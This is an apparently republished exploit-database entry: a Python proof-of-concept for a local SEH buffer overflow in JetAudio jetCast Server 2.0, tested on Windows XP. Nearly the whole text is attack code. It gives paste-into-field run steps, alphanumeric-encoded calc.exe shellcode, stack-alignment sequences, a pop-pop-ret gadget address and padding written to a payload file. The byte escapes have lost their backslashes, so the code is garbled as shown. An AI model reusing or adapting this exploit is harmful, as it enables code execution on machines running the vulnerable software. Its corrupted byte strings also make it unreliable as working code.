JetAudio jetCast Server 2.0 Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 285

# Title: JetAudio jetCast Server 2.0 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow
# Date: May 13th, 2019
# Author: Connor McGarr (https://connormcgarr.github.io)
# Date: May 13th, 2019
# Author: Connor McGarr (https://connormcgarr.github.io)
# Vendor Homepage: http://www.jetaudio.com/
# Software Link: http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/Download/jetCast/build/JCS2000.exe
# Version v2.0
# Tested on: Windows XP SP3 EN

# TO RUN:
# 1. Run python script
# 2. Copy contents of pwn.txt
# 3. Open jetCast
# 4. Select Config
# 5. Paste contents of pwn.txt into "Log directory" field
# 6. Click "OK"
# 7. Click "Start"

# For zeroing out registers before manual shellcode
zero = "x25x01x01x01x01" # and eax, 0x01010101
zero += "x25x10x10x10x10" # and eax, 0x10101010

# Save old stack pointer
restore = "x54" # push esp
restore += "x59" # pop ecx
restore += "x51" # push ecx

# Align the stack to 0012FFAD. Leaving enough room for shell. Using calc.exe for now.
# 4C4F5555 4C4F5555 4D505555
alignment = "x54" # push esp
alignment += "x58" # pop eax
alignment += "x2dx4cx4fx55x55" # and eax, 0x4C4F5555
alignment += "x2dx4cx4fx55x55" # and eax, 0x4C4F5555
alignment += "x2dx4dx50x55x55" # and eax, 0x4D505555
alignment += "x50" # push eax
alignment += "x5c" # pop esp

# calc.exe - once again, giving you enough room with alignment for shell. Calc.exe for now.
# 2C552D14 01552D14 01562E16
shellcode = zero
shellcode += "x2dx14x2dx55x2c" # sub eax, 0x2C552D14
shellcode += "x2dx14x2dx55x01" # sub eax, 0x01562D14
shellcode += "x2dx16x2ex56x01" # sub eax, 0x01562E16
shellcode += "x50" # push eax

# 24121729 24121739 2414194A
shellcode += zero
shellcode += "x2dx29x17x12x24" # sub eax, 0x24121729
shellcode += "x2dx39x17x12x24" # sub eax, 0x24121739
shellcode += "x2dx4ax19x14x24" # sub eax, 0x2414194A (was 40 at the end, but a miscalc happened. Changed to 4A)
shellcode += "x50" # push eax

# 34313635 34313434 34313434
shellcode += zero
shellcode += "x2dx35x36x31x34" # sub eax, 0x34313635
shellcode += "x2dx34x34x31x34" # sub eax, 0x34313434
shellcode += "x2dx34x34x31x34" # sub eax, 0x34313434
shellcode += "x50" # push eax

# 323A1245 323A1245 333A1245
shellcode += zero
shellcode += "x2dx45x12x3ax32" # sub eax, 0x323A1245
shellcode += "x2dx45x12x3ax32" # sub eax, 0x323A1245
shellcode += "x2dx45x12x3ax33" # sub eax, 0x333A1245
shellcode += "x50" # push eax

# Restore old stack pointer. MOV ECX,ESP
move = zero
move += "x2dx40x3fx27x11" # sub eax, 0x403F2711
move += "x2dx3fx3fx27x11" # sub eax, 0x3F3F2711
move += "x2dx3fx3fx28x11" # sub eax, 0x3F3F2811
move += "x50" # push eax

payload = "x41" * 520
payload += "x70x06x71x06" # JO 6 bytes. If jump fails, default to JNO 6 bytes into shellcode.
payload += "x2dx10x40x5f" # pop pop ret MFC42.DLL
payload += "x41" * 2 # Padding to reach first instruction
payload += restore
payload += alignment
payload += shellcode
payload += move
# Using ECX for holding old ESP. x41 = INC ECX
# so using x42 = INC EDX instead.
payload += "x42" * (5000-len(payload))

f = open('pwn.txt', 'w')
f.write(payload)
f.close()